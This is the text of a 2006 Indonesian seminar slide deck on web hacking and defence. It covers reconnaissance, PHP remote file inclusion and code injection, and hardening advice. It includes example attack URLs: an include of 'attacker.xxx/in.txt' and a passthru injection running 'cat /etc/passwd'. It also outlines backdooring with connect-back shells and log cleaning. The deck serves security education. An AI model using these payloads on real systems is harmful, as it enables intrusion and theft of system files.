Upload
ammar-wk
View
1.293
Download
4
Tags:
Embed Size (px)
Citation preview
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
Ahmad Muammar W. Khttp://www.google.com/search?q=y3dips
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
theoryhow 2 start , lookin for foods , we “ drive in “ , what we choose, web hacking
surviveuser, developer, administrator
simulationfrom 33 to 0
discussion
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
do we know hacking ?
hacker != cracker
hacking is not defacing
f.a.q 4 newbies version 1.0 at (http://ezine.echo.or.id/ezine8/ez-r08-y3dips-faqfn.txt)
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
footprinting , scanning , enumeration
need to find a low security machinelazy admin
un-patch
default are fault
more n more ….. pe-de-ka-te with target
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
from open port80 are open, 22 are open, 25 are open, …
operating system vulnerability windows xp sp 1, redhat 8.0remote ?
application bug authentication attack (bruteforcing, password guessing)passive action (sniffing)social engineering
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
well known services are open ?
ssh, smtp, https, pop3 …. also open
web server are open
should we do web hacking
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
hacking over httphacking against web applicationweb browser attackusing http rules (method)
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
on the top of the layermost of server in i-net running web serverhow about Firewall ?
it’s a legal requestun-filtered ?
dynamically changedrun multiple application (voting, guestbook, e.t.c)more friendly >< more easier
On The Top of Security Level Layer
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
web browser ? (opera, firefox)command line interface (msdos, bash)programming languagereference : advisories
http request(clear text/ ssl)
FirewallUserWeb Server
Database Server
Web application
•Apache•IIS•Tomcat•Netscape
Http reply (HTML, Javascript, VBscript)
Plugins•Perl•PHP•JSP•E.t.c
•MsSQL•Postgre•Mysql•Oracle
Web Hacking
Client side attack (xss, cookies stealing)
Information Disclosure
OS commanding (SQL, SSI, Ldap, Xpath )
Brute Force
Path travesal
Denial Of Service
Remote command execution (php)
Sumber: http://www.webappsec.org
Etc
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
suatu jenis serangan yang dilakukan dengan meng-include-kan halaman web lain kepada suatu situs/web aplikasi.
index.php ( bug in $file variable)http://victim.com/index.php?file=readme.txthttp://victim.com/index.php?file=http://echo.or.id
http://advisories.echo.or.id/adv/adv33-K-159-2006.txt
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
http://echo.or.id
victim
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
Real site
<? phpinfo();?>
Change url “http://echo.or.id’ > http://attacker.xxx/in.txt
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
suatu jenis serangan yang dilakukan dengan meng-include-kantag-tag bahasa pemrograman secara remote dan mengakibatkanweb yang “vulnerable” akan mengeksekusi “request” yang dikirimkan.
viewtopic.php ( bug at highlight variable)http://victim.com/viewtopic.php?t=48http://victim.com/viewtopic.php?t=48&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd;cat /etc/passwd
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
defacingprivate data stolensystem compromisezombie ( ddos agent, botnet agent )e.t.c
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
Kegiatan merubah/merusak tampilan suatu website baik halaman utama (index) ataupun halaman lain yang masih terkait dalam satu url dengan
website tersebut (folder lain ; file lain)
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
Ahmad Muammar W. K.
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
always update ur systemuse a firewall, antivirus, good backup facility, etcusing good password/pass phrase be carefull of social engineeringcarefully in using public facility ( cyber cafe )secure login/Secure connection (https ; ssh)update an information
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
secure programminginput validation encryption in authenticationset error log to offwhat u need? and what u can?update an information
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
policy (strict restriction)optimal setting on serverfunction restriction
php (passthru , system, exec) ; mssql (xp_cmdshell, xp_regdeletekey, xp_msver); mysql (system).
update the system (security pacth/update)update an information
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
Ahmad Muammar W. K.
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
pe-de-ka-teweb hacking process
php injection, enumerationescalating priveledge
ptrace-kmodbackdooring
bindtty, connect-backcleaning our footprints
remove.c
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
Ahmad Muammar W. K.
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
http://kaos.echo.or.id